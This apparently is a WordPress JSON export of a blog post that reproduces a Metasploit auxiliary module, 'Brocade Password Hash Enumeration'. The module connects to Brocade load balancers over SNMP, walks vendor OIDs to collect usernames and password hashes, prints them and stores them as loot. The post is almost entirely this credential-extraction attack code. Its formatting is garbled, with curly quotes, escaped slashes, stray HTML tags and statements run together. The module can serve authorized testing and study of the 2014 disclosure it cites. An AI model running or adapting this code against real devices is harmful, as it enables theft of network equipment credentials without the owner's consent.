##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n
def initialize
super(
‘Name’ => ‘Brocade Password Hash Enumeration’,
‘Description’ => %q{
This module extracts password hashes from certain Brocade load
balancer devices.
},
‘References’ =>
[
[ ‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/2014\/05\/15\/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string\/’ ]],
‘Author’ => [‘Deral “PercentX” Heiland’],
‘License’ => MSF_LICENSE
)<\/p>\n
end<\/p>\n
def run_host(ip)
begin
snmp = connect_snmp<\/p>\n
if snmp.get_value(‘sysDescr.0’) =~ \/Brocade\/<\/p>\n
@users = []snmp.walk(“1.3.6.1.4.1.1991.1.1.2.9.2.1.1”) do |row|
row.each { |val| @users << val.value.to_s }
end<\/p>\n
@hashes = []snmp.walk(“1.3.6.1.4.1.1991.1.1.2.9.2.1.2”) do |row|
row.each { |val| @hashes << val.value.to_s }
end<\/p>\n
print_good(“#{ip} – Found user and password hashes:”)
end<\/p>\n
credinfo = “”
@users.each_index do |i|
credinfo << “#{@users[i]}:#{@hashes[i]}” << “\\n”
print_good(“#{@users[i]}:#{@hashes[i]}”)
end<\/p>\n
#Woot we got loot.
loot_name = “brocade.hashes”
loot_type = “text\/plain”
loot_filename = “brocade_hashes.txt”
loot_desc = “Brodace username and password hashes”
p = store_loot(loot_name, loot_type, datastore[‘RHOST’], credinfo , loot_filename, loot_desc)<\/p>\n
print_status(“Credentials saved: #{p}”)
rescue ::SNMP::UnsupportedVersion
rescue ::SNMP::RequestTimeout
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error(“#{ip} – Error: #{e.class} #{e}”)
disconnect_snmp
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::SNMPClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Brocade Password Hash Enumeration’,‘Description’ => %q{This module extracts password hashes from certain Brocade loadbalancer devices.},‘References’ =>[[ ‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/2014\/05\/15\/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string\/’ ]],‘Author’ => [‘Deral “PercentX” Heiland’],‘License’ => MSF_LICENSE) end def run_host(ip)beginsnmp = connect_snmp if snmp.get_value(‘sysDescr.0’) =~ \/Brocade\/ @users = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59337","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59337","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59337"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59337\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59337"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59337"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59337"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}